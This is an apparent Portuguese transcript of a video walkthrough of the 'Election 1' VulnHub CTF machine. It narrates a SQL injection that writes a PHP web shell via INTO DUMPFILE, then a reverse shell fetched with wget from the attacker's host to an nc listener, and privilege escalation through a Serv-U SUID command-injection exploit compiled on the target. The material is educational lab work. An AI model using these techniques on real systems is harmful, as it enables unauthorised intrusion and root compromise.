Fala pessoal, estamos começando aqui a nossa 21ª máquina, a Election 1. Foi bem divertido fazer essa máquina aqui e novamente o estudo maior que a gente vai ter nela aqui vai ser em relação à pós-exploração. Não vou dar muitos detalhes agora, vamos começar aqui a prática da máquina e eu já vou explicando para vocês aí o que a gente vai fazer aí nesse cara. Eu já fiz a parte de recon aqui, né? Já peguei o IP e tal, então você pode fazer aí toda a parte de scan, enumeração, etc, né? Aqui a IP dela é 192.168.239. Lembra que se a gente der um barra robots.txt, às vezes a gente pode encontrar alguma coisa legal ali, né, demonstrando o que está liberado, o que não está liberado na aplicação. E aqui nesse caso a gente consegue ver que tem algumas coisas rodando, como por exemplo aqui o Election. Então se você chamar o diretório Election aqui, você vai ver que essa a aplicação que está rodando aqui, né, ela é uma aplicação para fazer pesquisa, onde o pessoal consegue votar e consegue interagir, né, em um sistema colaborativo aqui. Se você tentar inserir aqui algum comando, alguma coisa, ele vai dizer que você precisa se registrar, né? Então aí o próximo passo seria a gente procurar uma vulnerabilidade nesse cara. Então se a gente der um source exploit aqui, election, eu escrevi errado, search. Você vê aqui, ó, que na versão 2.0 ele tem uma falha de SQL injection. Então, se você procurar aqui se você copiar aqui o search exploit-m no exploit 48122, você vai ver aqui que ele fala de um exploit de SQL injection, né, dentro do diretório o election admin ajax op candidate aqui, ó. Então, ele fala aqui que é dentro do portal de admin tem um portal de seleção de candidatos onde você consegue editar, né, um candidato. Ele até passa aqui o log da request do burp e ele faz então o SQL injection dentro desse ID aqui, ó, nesse parâmetro via post para o op candidate aqui. Se a gente tentar abrir esse diretório aqui dentro da aplicação, ele vai dar um request denied aqui, né? Porque a gente precisa estar logado. Então, a gente já supõe aqui que sem até mesmo vendo aqui os cookies que ele está passando na request aqui, a gente vê que é necessário estar logado aí na aplicação. A gente até pode tentar copiar essa requisição aqui com esse mesmo cookie que está descrito ali, né, e jogar aqui no burp, mas eu não sei se a gente vai realmente conseguir fazer a requisição. Então vamos jogar aqui para ver se ele vai responder alguma coisa. Aí deu request denied do mesmo jeito. Então a gente precisa se logar. Aqui dentro do diretório do Election, você pode fazer uma enumeração, né, rodar um dirb aqui, alguma coisa assim, para você poder buscar informações ali dentro, né? Como a gente sabe que a aplicação roda em PHP, a gente pode fazer uma enumeração aqui de arquivos PHP. Então você pode chamar o dirb http 192.168.2.39 e você pode passar então o "-x" maiúsculo .php para ele procurar, utilizando aqui a biblioteca comum mesmo do dirb, arquivos que tenham a extensão .php, né, dentro do server. Então ele vai fazendo a varredura aqui, ó. A gente procurou dentro do diretório raiz do server, ele só achou o phpinfo.php. Mas se a gente passar aqui o /election, ele já conseguiu encontrar aqui o card.php e o index.php. Então, se a gente chamar o card.php aqui, isso aqui é uma dica que a gente vai ter aqui no CTF. Na vida real, isso aqui não funcionaria dentro de qualquer election, tá? O card.php é um arquivo que o pessoal que desenvolveu essa máquina deixou aqui para a gente conseguir pegar a credencial do administrador aqui para poder logar na aplicação para poder fazer o ataque.
Esse arquivo aqui você vê um monte de binário aqui, né? Então a primeira coisa que você supõe quando você vê um monte de binário é que você pode converter ele para texto, né? Utilizando um conversor de binário. Então se você procurar no Google, né, binário to text ou binary to text, né, ou o binário to texto, alguma coisa do tipo, você vai cair em alguns sites como esse aqui, por exemplo. Então aqui, ó, se você jogar aquele monte de binário, ele vai converter em outros binários aqui. Então, se você tentar converter de novo esses outros binários aqui na segunda vez, né, ele vai mostrar para você que o usuário é 1234 e a senha aqui, ó, é essa senha que está escrito aqui. Então, a gente conseguiu, né, a senha para acessar a aplicação. Assim, a gente já vai conseguir fazer, né, aquele SQL injection ali que a gente viu que tem falha aqui na aplicação. Então, aqui, se a gente botar um /admin no election, você não precisa nem fazer a numeração para imaginar que admin vai para o painel administrador, né? Mas você pode rodar o dib ali, você vai conseguir achar o diretório admin dentro do Election. Mas se você quer se logar numa aplicação, geralmente vai ser /admin, sigin, alguma coisa do tipo, né? Aqui a gente pode passar então o ID que ele estava escrito lá, que é 1234, e aquela senha que a gente converteu lá. Então assim a gente conseguiu acessar aqui a aplicação, né? Então agora de fato começa a nossa brincadeira aqui. Como a gente viu aqui no exploit, esse exploit é um exploit de SQL Injection, então você precisa se logar, procurar aonde está o painel de seleção dos candidatos, né? Ele mandou você capturar a request com o burp aqui e para você poder fazer então o seu SQL Injection aí, né? Então se a gente vier aqui na aplicação, né, vier navegar nela aqui, ó, você vai ver que tem um painel de candidatos aqui, ó. Então nesse lugar aqui é onde a gente vai conseguir fazer aquela requisição. Eu vou ligar o intercept aqui, porque no momento que você mandar editar um dos candidatos aqui, repare que a requisição que ele vai fazer aqui é exatamente a mesma requisição que ele está fazendo aqui no exploit, ó. Com a diferença que o cookie que a gente tem agora é válido, né? Porque agora a gente consegue fazer essa requisição porque a gente está logado. Então a gente, para não ficar tendo que voltar a requisição aqui, a gente pode jogar ela para o repeater, né, para a gente poder repetir a requisição mais do que uma vez aqui, né? Então, aqui dentro do repeater você pode mandar um send para ver a resposta, ó, e a resposta dele, ele traz aqui algumas coisas que tem lá dentro do server. Então, ele está fazendo um select lá em algumas tabelas, né, do usuário 76 aqui, ó, né, o ID 76 e trazendo essas informações. Então, como é que a gente vai saber se isso aqui está vulnerável, né? Se a gente inserir algum comando aqui, tipo uma aspas, por exemplo, ele vai ter que dar algum tipo de erro, né? Alguma coisa vai acontecer. Então, ó, repare que quando a gente manda uma aspa simples aqui, né, e envia a requisição, ó, ele retorna 404, ou seja, ele não encontrou o que a gente mandou fazer aqui. Mas isso já é um sinal que alguma coisa aconteceu, que talvez a gente consiga fazer uma injeção mesmo, né? E como a gente já viu que tem essa vulnerabilidade dentro desse post aqui, a gente pode seguir então com a nossa exploração do SQL Injection. É, a gente, só o fato da gente ver esse monte de resposta aqui já faz a gente pensar que para fazer o nosso ataque a gente vai ter que enumerar esse banco, obviamente, né? Se você fizer como a gente já fez antes e jogar aqui um Union Select, por exemplo, né, e um user, sei lá, para ver se ele vai trazer alguma informação para ver se é MySQL, né? O banco lá, como a gente já viu na máquina anterior, ele não trouxe nada aqui, ó, mesmo você comentando no final aqui, porque a sintaxe vai estar errada da nossa injeção aqui do SQL. Então, como é que a gente vai conseguir testar isso? Existe um tipo de SQL injection, né, que tem gente que chama de Union Based, o SQL Injection Union Attacks, né, como está aqui no site da Portswigger. Mas o que consiste nesse ataque, né? É você fazer uma enumeração do número de colunas que existem naquela tabela ali que ele está fazendo aquele select, né? Para você conseguir fazer a sintaxe correta ali da tua inserção do SQL. Então ele mostra aqui para a gente nesse tutorial que você pode usar o order by para mostrar, para ordenar, né, as colunas aqui, para você conseguir identificar um número de colunas daquela tabela que você está, que a aplicação está fazendo aquele select naquele momento, né? Então, quando você executa um order by 1, por exemplo, ele vai te dizer que se ele não mudar nada na resposta ali, é porque existe uma coluna. Se você jogar o 2,
tem duas, três, quatro, e assim vai indo, você consegue enumerar, né, para ver quantas colunas tem ali naquela tabela. Então, se a gente vier aqui no Burp, ó, e a gente mandar aqui um order by 1 aqui, e dar um menos menos aqui para comentar a sequência, né? Repare que, não, que ele trouxe a resposta aqui e não mudou nada para a gente no que diz aqui. Então, se eu jogar um 2, ó, ele continua trazendo a mesma resposta. Um 3, ele vai continuar trazendo a mesma resposta. E assim você vai indo até você achar o número certo de colunas. Ó, 4, a gente sabe que ainda tem 4 colunas. 5, 5 colunas. 6, opa, no 6 já deu um erro, então eu sei que são 5 colunas. Por que que isso é importante? Porque na hora que eu for fazer por exemplo, for mandar aqui um union select, eu vou ter que passar todas aquelas colunas para não dar erro na sintaxe aqui. Então, basicamente, você vai ter que passar aqui, ó, as 5 colunas, né, para funcionar o teu ataque, né, a tua injeção. Então, mandando essa requisição aqui, ó, ele deu um erro, né, porque a gente não colocou nada aqui no nosso select. Mas se você então aqui agora, se você voltar o ID para o primeiro aqui, porque ele está fazendo o primeiro select no 76. Então eu vou voltar para o primeiro ID de todos aqui, o ID 1. Então aqui eu posso colocar qualquer coisa, né, deixar em branco assim mesmo. E aqui dentro desses caras aqui, você pode colocar outros comandos para rolar esse select aqui. Então se a gente colocar aqui, por exemplo, vamos escrever aqui o primeiro um C, o segundo um A, um terceiro um T de cat e um X aqui e um 003 aqui. O que você quiser colocar aí, né? Então repare que ele trouxe uma resposta, ó, e o primeiro parâmetro aqui que a gente deu, o select, ele não alterou nada aqui, ó. Ele trouxe o status code, que a resposta foi 200. Então esse primeiro parâmetro aqui, a gente já sabe que não adianta a gente pôr nada nele aqui, que ele não vai trazer a resposta pra gente. Aqui no segundo, ó, ele já imprimiu o A que a gente mandou ele imprimir aqui. No terceiro parâmetro aqui, ó, que é a coluna aquelas aqui, ó, né, ele trouxe o T que a gente mandou ele escrever aqui. Na coluna FBID aqui, ó, ele trouxe o 003 aqui, né, e o bio ele trouxe o X. Então a gente já sabe que esse segundo aqui, ó, é a última saída aqui do SQL. Então a gente pode, por exemplo, mandar um comando aqui. Agora a gente consegue enumerar qualquer versão do banco. Então se eu mandar um version aqui, ó, deixa eu apagar isso aqui para ele ficar em branco, ficar mais fácil da gente ver aqui, né? Ó, aqui no final ele imprimiu para a gente a versão do MariaDB aqui, ó. Então está funcionando o nosso SQL Injection. Agora que a gente sabe que está funcionando o nosso SQL Injection, que a gente já conseguiu montar o nosso payload aqui de injeção, aqui dentro do. Lembra que a gente fez naquela outra máquina que a gente comprometeu o banco lá? A gente utilizou o parâmetro select into dump file para escrever num arquivo? Então aqui agora a gente vai conseguir utilizar o select into dump file para criar a nossa shell lá dentro do server, inserir no server a nossa shell. Lembra que ali no começo, na nossa enumeração, a gente encontrou, né, o PHP, phpinfo.php aqui dentro do server, né? 192.168.239/phpinfo.php. Se você não encontra um arquivo desse tipo ou algo que te diga qual que é a raiz do servidor, né? Geralmente no Linux é /var/www/html. Nesse caso aqui, como a gente encontrou um arquivo, né, de phpinfo aqui, a gente consegue aqui nesse arquivo encontrar qual que é a raiz do server, né, aqui, ó. Ele está dizendo que é var www.html. Então, mas se você não achasse esse arquivo aqui, né, você poderia deduzir que talvez seja isso ou ir na tentativa e erro até achar. E é legal que aqui, né, você consegue ver os módulos de PHP que estão instalados e tal, tudo que está rodando na aplicação. Isso também é uma vulnerabilidade de estar exposto, né, que geralmente os desenvolvedores usam isso para testar aí na aplicação, né, ou algumas coisas. E rodam o PHP Info para ver se está funcionando e geralmente não apaga esse cara. Então fica lá o PHP Info
esperando algum invasor achar ele para ver o que está rodando no server, né? Então agora a gente vai fazer aqui, ó, dentro dessa nossa injeção, a gente pode passar aqui umas aspas duplas para poder escrever o nosso PHP aqui dentro. Por que eu passei aspas duplas? Porque dentro da shell que eu vou escrever aqui, ele vai ter uma aspa simples. Então se eu não colocasse aspas duplas aqui, ele ia crashar o nosso comando. Então se você chamar aqui, né, o PHP, passa a estrutura aqui do PHP, a gente vai utilizar uma biblioteca chamada System. Essa biblioteca ela é igual o exec, igual o sysexec, né? Dessa vez a gente vai utilizar a System. Aqui dentro da função system, você pode passar esse argumento porque se você olhar a sintaxe aqui da função system, aqui dentro da documentação do PHP, ele fala para você que você precisa passar o comando que vai ser executado no server, né, e ele salva essa saída dentro de uma variável. A gente não vai fazer dessa forma. O que que a gente vai fazer? A gente vai passar aqui dentro do system qual que é o método de chamada que a gente vai fazer para essa URL. Então você cria você chama aqui o método get. Você poderia passar por post também, ou request, como você preferir. Mas eu vou passar o get aqui para a gente poder passar um parâmetro. E aqui dentro do parâmetro a gente tem que passar um nome para ele. Então eu vou chamar de a esse parâmetro, né, e botar o ponto e vírgula para fechar aqui. O que que isso significa? Que quando eu chamar uma requisição GET para o server passando o parâmetro A, o que eu passar para o parâmetro A ele vai executar dentro de sistema lá no server. Então a gente escreveu aqui a nossa shell e a gente precisa fazer essa shell ir para algum lugar. Então a gente vai dar um into dump file e aqui você abre as pinhas simples e diz qual que é o diretório no server. Então barra var barra www var barra www barra html barra arquivo.php. Então o que a gente está fazendo aqui, né? Ele vai fazer o select no ID 1 e um union select, então ele vai fazer o select e vai unir esse select mais um select dentro de todas essas colunas aqui, né, do banco. Só que a gente está mandando ele printar essa sintaxe toda aqui dessa shell de PHP e ele vai escrever isso na tela, então, na hora do select. A gente já viu que a gente consegue fazer escrever, né, com o select aqui. Então, a hora que a gente fizer essa escrita, a gente vai mandar ele salvar isso dentro de um arquivo, into dump file, em barra var www.html, né, arquivo.php. Então, agora, a partir do momento que eu executar isso aqui, ó, por mais que ele tenha dado um 404 aqui, né, que ele não encontrou, que a gente fez o select aqui, se a gente vier aqui dentro do diretório do Election aqui, ó. Opa, não é nem no diretório do Election, a gente jogou na raiz do servidor. Chamar arquivo.php. Opa, ele não encontrou o arquivo aqui. Como é que a gente escreveu? Arquivo.php. Tem alguma coisa errada aqui. Deixa eu fazer o seguinte. Eu vou jogar esse último parâmetro aqui, ó. Deixa eu apagar esse cara e deixar o PHP por último. E vou aqui na frente passar mais uma coluna em branco. Deixar para escrever na última coluna, vamos ver se vai dar certo dessa forma. Vou mandar um send aqui. Beleza, deu 404 lá de novo. Ó, agora ele conseguiu escrever o arquivo, tá vendo? Então, acho que foi só a sintaxe aqui, eu inverti. A gente tinha escrito aqui, ó, dentro desse parâmetro a nossa shell. Mas deu erro, ele não conseguiu executar. Eu joguei ela por último, deixei por último a nossa shell e esses parâmetros aqui em branco, essas colunas aqui em branco, né? Então a gente conseguiu executar o arquivo.php. Então se a gente passar um parâmetro aqui para ele, o parâmetro a gente consegue executar comandos lá. Então mandar um ls aqui, ó, consegui dar um ls lá no server, tá vendo? Não, o name-a aqui. Olha, já conseguiu trazer então a primeira shell aí com o server, né? Agora a gente precisa abrir uma shell mais elaborada aí para a gente conseguir ter uma shell interativa, né? Então a gente pode vir aqui no nosso Kali, né? Vamos startar o handler aqui, sudo nc -nlvp na 443. Deixa eu abrir um outro terminal aqui. Dentro do diretório barra usr share web shells, tem várias shells web prontas aqui dentro do Kali.
a gente vai utilizar uma delas. Vou dar um cp/usr share web shells. Aqui dentro do web shells você tem várias linguagens. A gente vai escolher o PHP aqui, né, que é a linguagem da aplicação lá. E tem várias shells aqui de PHP. Então a gente vai utilizar essa reverse shell aqui, ó. Eu vou chamar aqui PHP reverse shell. Vou dar um ponto para copiar no diretório onde eu tô, barra arquivo2.php. Beleza, então agora se eu editar o arquivo2.php, ela é uma shell bem mais complexa do que as outras que a gente escreve geralmente de PHP aqui, né? Ela faz uma conexão via socket e tal, tem toda a tratativa de erro aqui, né? Ela é bem mais complexa do que a gente simplesmente rodar o netcat reverso ali, né? Mas ela ainda não é igual o Meterpreter, por exemplo, do Metasploit lá. É uma shell simples, né? Que só vai fazer uma conexão reversa, mas ela faz exatamente o mesmo que o netcat. A diferença é que aqui ela cria um processinho e tal, é mais legal, né, do que a shell simples. Mas se você quiser simplesmente escrever o NC lá que nem a gente sempre faz, pode escrever também, não tem problema. Aqui eu vou passar o IP do Kali, 92.168.2.1 e a porta aqui vou passar 443. Vamos salvar esse cara, né? Então aqui a gente pode subir o Simple Server, "-m simple http server". Aqui eu vou chamar na 8081. Então a gente pode voltar aqui na aplicação agora onde a gente está e dar um wget http 192.168.2.1 na 8081 arquivo 2.php. Então ele fez a requisição aqui, já baixou o arquivo, né? Se você quiser conferir, você pode dar um ls aqui. O arquivo 2.php está aqui, ó. Então agora a gente só precisa executar o arquivo 2. Então eu vou chamar aqui o arquivo 2.php. E assim que eu chamei ele, ó, ele abriu a shell aqui pra gente. Então agora que a gente tem, né, a nossa shell interativa, a gente pode fazer algumas buscas aí no server, né? A gente já deu a ID aqui, ele já veio com o usuário www.data. Então, para a gente escalonar privilégio, a gente pode ver ferramentas que estão rodando aqui, né? Rodar o linha num, como a gente já fez outras vezes aqui. Nesse caso, a gente vai usar aquela trick do find lá para procurar dentro da raiz arquivos que tenham permissão de root e que a gente consiga executá-los, né? Então, eu vou dar um find barra para procurar na raiz, menos perm igual... Opa, caguei, porque aqui não dá para apagar. Find barra menos perm menos s igual a u para procurar Opa, é menos u igual a s. Fiz caca de novo. Find barra, sem edição é isso mesmo. Perm menos u igual a s para procurar arquivos que tenham permissão de root, né? Menos t de era menos type. Caguei de volta. É que sem spawnar a shell aqui ele não deixa apagar. Find barra menos perm menos u igual a s menos type para procurar o tipo do arquivo. A gente vai botar f de file, né, e não de diretório. O 2 é para pegar o standard error e a gente vai jogar ele para barra dev barra null para poder mostrar a saída limpa, né, sem aparecer os erros. Se você não jogar o standard error para dev null, enquanto ele está rodando o find, tudo que ele não encontrou, né, mas ele está procurando e está dando erro e tal, ele vai ficar printando isso na tela. Então quando a gente joga para dev null, ele vai simplesmente ignorar os erros, né? Vai jogar os erros ali para dev null e vai mostrar só o que a gente está procurando, que são arquivos que tenham permissão de root e a gente consiga executá-los, né? Consiga editá-los ou chegar até eles. Esperar a boa vontade aqui da máquina, que a gente colocou só 512 MB de RAM para ela. Aí dá umas treta. Deixa eu ver, parece que deu erro lá atrás, eu acho que caiu o server. Deixa eu reiniciar ele aqui. Esperar ela subir de volta. Sem edição é isso mesmo. Vai ter que ficar vendo os erros aí. Deixa eu fechar aqui. Deixar o server esperando aqui.
Bom, aparentemente subiu de novo aqui. Deixa eu voltar aqui no server só para ver se ele está comunicando certinho. A gente chamou de arquivo, né? A nossa backdoor lá. Se ele roda o ls aqui. Olha, tá demorando para rodar, não subiu direito o server lá ainda. Vamos esperar mais um pouquinho. Aí foi. Ele caiu a nossa shell, né? Obviamente. Vou startar de novo o NC aqui. Bom, a gente já inseriu a nossa backdoor lá no server, então é só requisitar ela. Vou dar um seu URL, http // 192.68.2.39 barra arquivo 2.php. Então abriu ali a nossa sessão, né? Já está funcionando o nosso backdoor lá que a gente inseriu já hoje. Então vamos lá, find dentro do barra, né? Arquivos que tenham permissão com menos perm. Eita, cadê? Find barra menos perm nos u igual a s menos type de tipo f de file 2 para standard error barra dev barra null. Aí, vamos esperar a boa vontade dele executar agora e ver se não vai crashar de novo. A falta de memória. Já tá rodando ainda, vamos ver. Sempre que os caras sobem essas VM com interface gráfica também, aí precisa pôr mais memória, né? O ruim de jogar CTF com máquinas, né, do VunHub, máquinas que a gente faz o download é isso, né? Que às vezes dá uns problemas na máquina aí. Mas faz parte do desafio, né, pessoal? Aí eu vejo gente perguntando no grupo lá umas coisas meio básicas sobre subir as máquinas e tal. Tudo isso faz parte do teu aprendizado também. Que você entender como é que as coisas funcionam, até no teu próprio sistema operacional, é extremamente importante, né? Que demora para executar o find lá. Vamos esperar mais um pouquinho, assim que ele executar, eu continuo aqui com vocês. Aí, resolveu dar sinal de vida. Então aqui ele já está buscando, né, alguns arquivos aqui no server, ó. Um dos que chama a atenção da gente aqui, já logo de cara, é esse server U aqui, ó. É claro que se você desse um ps-alt aqui, você já vê ele rodando também, né? Esse server U ele é um serviço. Se você procurar no Google aqui o que que é, né? Você vai cair aqui no site da SolarWinds e vai ver que é um serviço de FTP aí que é um serviço pago, né? Ele não é open source, então você não tem acesso a código-fonte. Você pode então, agora que a gente sabe que ele está rodando ali, procurar vulnerabilidades, né, nesse cara aí, procurar exploit para esse cara. Se você der um search exploit serve você vai achar ele também ali dentro do search exploit, né? Ou se você procurar exploit para serve no Google, você vai cair nesse exploit aqui no exploit DB, né? O exploit 47009. Aparentemente, pelo que a gente vê aqui no exploit, ele é bem simples, né? Ele está fazendo uma requisição aqui e ele está passando como argumento um comando aqui de shell e executando o serve U aqui. Então, se você procurar sobre a CVE, você vai cair aqui, né? Todos esses links estão na descrição, tá? Vai cair na pesquisa aqui do Atagai, que é o cara que encontrou essa vulnerabilidade. Então vamos entender aqui esse exploit, que esse não é um exploit complexo, então a gente vai conseguir entender bem aí o que está rolando, e é legal até para entender o mindset aqui do cara na hora de pesquisar. Então ele fala aqui que a primeira coisa que você precisa saber, né, antes de pesquisar sobre esse exploit, é que dentro da linguagem C aqui, de acordo com o manual aqui na documentação da libc aqui, ó, ele fala que a função main, que é a função principal do sistema, né, ela pode ser declarada de três formas, né, só o int main ali, ou então as duas outras formas passando argumentos aqui como parâmetro. Então, esses argumentos que são passados como parâmetros, eles vão ser utilizados, né, como dentro como arrays aqui dentro da aplicação aqui, né, dentro do código C. Então, e ele fala aqui também sobre algumas funções da família exec, né? O execcl, execclp, execcle, cv, tem vários tipos de exec aqui, né? Da família exec. Então, são funções que executam, né, comandos de sistema, utilizam recursos do sistema operacional e retornam, né, algum tipo de ação. Então, ele fala aqui que a metodologia dele de pesquisar as vulnerabilidades fazer tentar fazer aí uma engenharia reversa do binário, né? Chegar até o código-fonte
e buscar funções que possam ser vetores aí de execuções, né, remotas, de inserção de comandos, né, que são vetores aí de funções que são potencialmente perigosas aí de se utilizar, né? Então, por exemplo, o system. Então, o que ele fez aqui? Ele pegou o ServView, né, e ele utilizou a ferramenta AIDA-Pro para fazer para descompilar o binário. O AIDA-Pro ele é pago, né? Tem várias outras ferramentas gratuitas que fazem isso também, tipo o GHidra, por exemplo, que a NSA desenvolveu. Tem outras ferramentas que são gratuitas que você consegue fazer consegue tentar descompilar, né, um binário compilado. E aí você tem, às vezes você consegue ter acesso, né, a código-fonte. Então, nesse caso aqui, depois que ele fez ele descompilou esse cara, ele começou a procurar dentro do código, ali, como ele disse, algumas funções e que são potencialmente, né, exploráveis. E o que chamou a atenção dele foi que ele encontrou várias funções de system executando comandos dentro do server. E o que chamou mais a atenção dele foi aqui, ó, nessa linha, onde tem o format string aqui, ó, que ele está passando o chmod u mais s aqui, ó, para dentro do file name of executable, utilizando o system para passar esse comando. Então, o que acontece? O que ele deduziu, né? Que se ele conseguir alterar o fluxo aqui na hora de inserir essa string, ele vai conseguir então executar comandos, né, com a permissão da aplicação. E essa aplicação ela roda como root. Então, quando ele roda esse system aqui, ele vai estar rodando o system como root. Então, basicamente, o que ele fez? Ele procurou como é que é o parâmetro que a aplicação recebe ali para poder executar aquela função, e ele chegou no prepare installation aqui, ó, que é o parâmetro que a aplicação vai receber para o fluxo de execução chegar dentro desse command aqui que vai ser executado, né, nesse system. Então ele percebeu que se ele passasse como parâmetro no prepare installation aqui alguma coisa que substituísse, né, o chmod mais o s aqui, ele ia conseguir executar isso no comando. Então ele faria aí o shell injection, que é a vulnerabilidade que ele encontrou. Então para fazer a POC, o que ele fez? Ele pegou o chmod mais o s, que é o comando que realmente é executado pelo sistema, e ele substituiu isso por um comando que aqui, ó, a hora que ele recebe o caminho USR local serveru aqui, ó, ele substituiu isso, né, por um comando, por exemplo, o binsh aqui, ó, ele abriu aspas duplas e usou o operador e aqui para inserir o barra binsh, né, e continuar aqui a execução. Então, assim, dessa forma ele conseguiu executar, além fazer o sistema executar o binsh como root, né? Então, se você ler o exploit dele aqui, ele está passando o primeiro argumento aqui, ó, um comando que é o ID, para ver qual que é o ID que ele pegou, né? E um echo open, ele manda escrever na tela, ó, que está abrindo uma shell de root, então ele executa o binsh. Ele passa isso no argumento do prepare installation, foi assim que ele conseguiu fazer a exploração. Que, como ele disse aqui no começo, que a gente precisa saber lá sobre a função main e tal, né, na linguagem C, que recebe os parâmetros e tal, então, como argumento, e ele descobriu ali que todo o fluxo da execução, se ele passasse para o parâmetro prepare installation, né, o comando que ele quiser aqui, vai ser executado como root lá no server. Então ele faz aqui um execv aqui e manda executar o rsr local serve aqui, né, passando os argumentos aqui, ó, que foi o que ele escreveu aqui em cima, né, nesse char aqui. Então, dessa forma, né, nesse fluxo todo de execução, ele consegue fazer com que a chamada do sistema passe o binsh como argumento e a gente acaba recebendo aí um acesso como root. Então, a gente pode procurar o exploit 47009 aqui no Kali, né? Deixa eu abrir aqui mais um terminalzinho. Sersploit "-m 47009". Ele copiou aqui o 47009.c. Então a gente pode jogar ele lá para o server para compilar lá dentro. Você pode compilar aqui também, mas vamos lá no /tmp. Eu vou mover o 47009 aqui. Eu vou chamar ele de arquivo 3.c. Python, vamos startar o simple server, né? Python "-m simple http server na 8081
Aqui no TMP, ó, a gente está aqui no TMP lá no server, vou dar um wget http 192.168. Eita, não deixa apagar. Maravilha. Wget, tudo isso de preguiça de spawnar uma shell, né? http 192.168.2.1, que é o IP do Kali aqui, na porta 8081 barra arquivo 3.c. Beleza? Ele baixou aqui o arquivo 3.c, então já posso fechar essa janelinha aqui. Agora eu vou dar um gcc para compilar. Se não tiver gcc no server, você tem que compilar fora, né? Mas vamos lá, gcc-o de output, vou chamar ele de data, arquivo 3.c. Esperar a boa vontade dele aqui. Então ele compilou o data. Agora se eu der um ponto barra data aqui, ele vai executar, né, o arquivo C lá. Então ele pegou, já conseguiu executar o system com o ID de root ali. Então agora ele está abrindo uma shell de root, né? Então ele tá executando o bin.sh para a gente. Na verdade ele já executou, né? Não vai aparecer uma shell interativa bonitinha e tal, porque ele só dá um exec no bin.sh. Então se você der um ID aqui agora, você já está como root. Então a gente já pode navegar aqui, né? cd barra root. Então aqui dá um cat no root.txt para pegar a flag aqui. E a gente conseguiu então, né, o nosso acesso administrativo explorando essa falha aí no server U da SolarWinds. Beleza? Espero que vocês estejam gostando das máquinas que a gente está fazendo aqui. Aqui na descrição tá os links, né, de apoio para os materiais de estudo da máquina de hoje. Também está disponível aqui embaixo o link da VM de amanhã, beleza? Se alguém tiver alguma dúvida, manda mensagem lá no grupo. Não esqueçam de se inscrever aqui no canal, tá? E até amanhã, galera. Falou!